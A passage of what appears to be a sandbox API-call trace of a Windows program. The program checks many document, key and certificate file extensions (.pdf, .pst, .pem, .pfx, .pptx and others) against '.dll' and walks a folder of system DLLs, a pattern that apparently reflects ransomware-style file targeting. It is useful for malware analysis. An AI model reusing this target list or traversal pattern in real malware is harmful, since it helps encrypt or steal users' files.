returned 4 [0286.182] lstrcmpiW (lpString1=".odm", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".odp") returned 4 [0286.182] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".ods") returned 4 [0286.182] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".oft") returned 4 [0286.182] lstrcmpiW (lpString1=".oft", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".one") returned 4 [0286.182] lstrcmpiW (lpString1=".one", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".onepkg") returned 7 [0286.182] lstrcmpiW (lpString1=".onepkg", lpString2="2-0.dll") returned -1 [0286.182] lstrlenW (lpString=".onetoc2") returned 8 [0286.182] lstrcmpiW (lpString1=".onetoc2", lpString2="-2-0.dll") returned -1 [0286.182] lstrlenW (lpString=".opt") returned 4 [0286.182] lstrcmpiW (lpString1=".opt", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".oqy") returned 4 [0286.182] lstrcmpiW (lpString1=".oqy", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".orf") returned 4 [0286.182] lstrcmpiW (lpString1=".orf", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".p12") returned 4 [0286.182] lstrcmpiW (lpString1=".p12", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".p7b") returned 4 [0286.182] lstrcmpiW (lpString1=".p7b", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".p7c") returned 4 [0286.182] lstrcmpiW (lpString1=".p7c", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".pam") returned 4 [0286.182] lstrcmpiW (lpString1=".pam", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".pbm") returned 4 [0286.182] lstrcmpiW (lpString1=".pbm", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".pct") returned 4 [0286.182] lstrcmpiW (lpString1=".pct", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pcx") returned 4 [0286.183] lstrcmpiW (lpString1=".pcx", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pdd") returned 4 [0286.183] lstrcmpiW (lpString1=".pdd", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pdf") returned 4 [0286.183] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pdp") returned 4 [0286.183] lstrcmpiW (lpString1=".pdp", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pef") returned 4 [0286.183] lstrcmpiW (lpString1=".pef", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pem") returned 4 [0286.183] lstrcmpiW (lpString1=".pem", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pff") returned 4 [0286.183] lstrcmpiW (lpString1=".pff", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pfm") returned 4 [0286.183] lstrcmpiW (lpString1=".pfm", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pfx") returned 4 [0286.183] lstrcmpiW (lpString1=".pfx", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".pgm") returned 4 [0286.183] lstrcmpiW (lpString1=".pgm", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".php") returned 4 [0286.183] lstrcmpiW (lpString1=".php", lpString2=".dll") returned 1 [0286.183] lstrlenW (lpString=".php3") returned 5 [0286.183] lstrcmpiW (lpString1=".php3", lpString2="0.dll") returned -1 [0286.183] lstrlenW (lpString=".php4") returned 5 [0286.183] lstrcmpiW (lpString1=".php4", lpString2="0.dll") returned -1 [0286.183] lstrlenW (lpString=".php5") returned 5 [0286.183] lstrcmpiW (lpString1=".php5", lpString2="0.dll") returned -1 [0286.183] lstrlenW (lpString=".phtml") returned 6 [0286.183] lstrcmpiW (lpString1=".phtml", lpString2="-0.dll") returned -1 [0286.183] lstrlenW (lpString=".pict") returned 5 [0286.183] lstrcmpiW (lpString1=".pict", lpString2="0.dll") returned -1 [0286.183] lstrlenW (lpString=".pl") returned 3 [0286.184] lstrcmpiW (lpString1=".pl", lpString2="dll") returned -1 [0286.184] lstrlenW (lpString=".pls") returned 4 [0286.184] lstrcmpiW (lpString1=".pls", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".pm") returned 3 [0286.184] lstrcmpiW (lpString1=".pm", lpString2="dll") returned -1 [0286.184] lstrlenW (lpString=".png") returned 4 [0286.184] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".pnm") returned 4 [0286.184] lstrcmpiW (lpString1=".pnm", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".pot") returned 4 [0286.184] lstrcmpiW (lpString1=".pot", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".potm") returned 5 [0286.184] lstrcmpiW (lpString1=".potm", lpString2="0.dll") returned -1 [0286.184] lstrlenW (lpString=".potx") returned 5 [0286.184] lstrcmpiW (lpString1=".potx", lpString2="0.dll") returned -1 [0286.184] lstrlenW (lpString=".ppa") returned 4 [0286.184] lstrcmpiW (lpString1=".ppa", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".ppam") returned 5 [0286.184] lstrcmpiW (lpString1=".ppam", lpString2="0.dll") returned -1 [0286.184] lstrlenW (lpString=".ppm") returned 4 [0286.184] lstrcmpiW (lpString1=".ppm", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".pps") returned 4 [0286.184] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".ppsm") returned 5 [0286.184] lstrcmpiW (lpString1=".ppsm", lpString2="0.dll") returned -1 [0286.184] lstrlenW (lpString=".ppt") returned 4 [0286.184] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0286.184] lstrlenW (lpString=".pptm") returned 5 [0286.184] lstrcmpiW (lpString1=".pptm", lpString2="0.dll") returned -1 [0286.184] lstrlenW (lpString=".pptx") returned 5 [0286.184] lstrcmpiW (lpString1=".pptx", lpString2="0.dll") returned -1 [0286.184] lstrlenW (lpString=".prn") returned 4 [0286.184] lstrcmpiW (lpString1=".prn", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".ps") returned 3 [0286.185] lstrcmpiW (lpString1=".ps", lpString2="dll") returned -1 [0286.185] lstrlenW (lpString=".psb") returned 4 [0286.185] lstrcmpiW (lpString1=".psb", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".psd") returned 4 [0286.185] lstrcmpiW (lpString1=".psd", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".pst") returned 4 [0286.185] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".ptx") returned 4 [0286.185] lstrcmpiW (lpString1=".ptx", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".pub") returned 4 [0286.185] lstrcmpiW (lpString1=".pub", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".pwm") returned 4 [0286.185] lstrcmpiW (lpString1=".pwm", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".pxr") returned 4 [0286.185] lstrcmpiW (lpString1=".pxr", lpString2=".dll") returned 1 [0286.185] lstrlenW (lpString=".py") returned 3 [0286.185] lstrcmpiW (lpString1=".py", lpString2="dll") returned -1 [0286.185] lstrlenW (lpString=".qt") returned 3 [0286.185] lstrcmpiW (lpString1=".qt", lpString2="dll") returned -1 [0286.185] lstrlenW (lpString=".r3d") returned 4 [0286.185] lstrcmpiW (lpString1=".r3d", lpString2=".dll") returned 1 [0286.185] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0286.185] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0286.185] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x58c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="APFD9C~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="APC00F~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x50c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="AP0479~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="AP23C9~1.DLL")) returned 1 [0286.186] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="APCB40~1.DLL")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="APAE51~1.DLL")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x68c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="AP972F~1.DLL")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="AP7D9E~1.DLL")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="APFCAD~1.DLL")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="AP8F34~1.DLL")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="APD1B7~1.DLL")) returned 1 [0286.187] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="APBF0F~1.DLL")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="AP5E4C~1.DLL")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="AP80F4~1.DLL")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb979f700, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x27c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="ApiClient.dll", cAlternateFileName="APICLI~1.DLL")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9bc01200, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xa02d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVCatalog.dll", cAlternateFileName="APPVCA~1.DLL")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1f5ad8, dwReserved0=0x0, dwReserved1=0x0, cFileName="appvcleaner.exe", cAlternateFileName="APPVCL~1.EXE")) returned 1 [0286.188] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x4b0d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVFileSystemMetadata.dll", cAlternateFileName="APPVFI~1.DLL")) returned 1 [0286.189] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a330a6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a330a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x2052d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVIntegration.dll", cAlternateFileName="APPVIN~1.DLL")) returned 1 [0286.189] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a59305, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a59305, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x726d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVIsvApi.dll", cAlternateFileName="APPVIS~1.DLL")) returned 1 [0286.189] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1b7300, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x60ea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvIsvStream32.dll", cAlternateFileName="APPVIS~2.DLL")) returned 1 [0286.189] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb5e67000, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x73aa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvIsvStream64.dll", cAlternateFileName="APPVIS~3.DLL")) returned 1 [0286.189] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x336d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVIsvStreamingManager.dll", cAlternateFileName="APPVIS~4.DLL")) returned 1 [0286.189] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1566d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVIsvSubsystemController.dll", cAlternateFileName="AP213A~1.DLL")) returned 1 [0286.189] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80aa57b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80aa57b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x18d60800, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x1ae0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvIsvSubsystems32.dll", cAlternateFileName="AP3342~1.DLL")) returned 1 [0286.190] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: 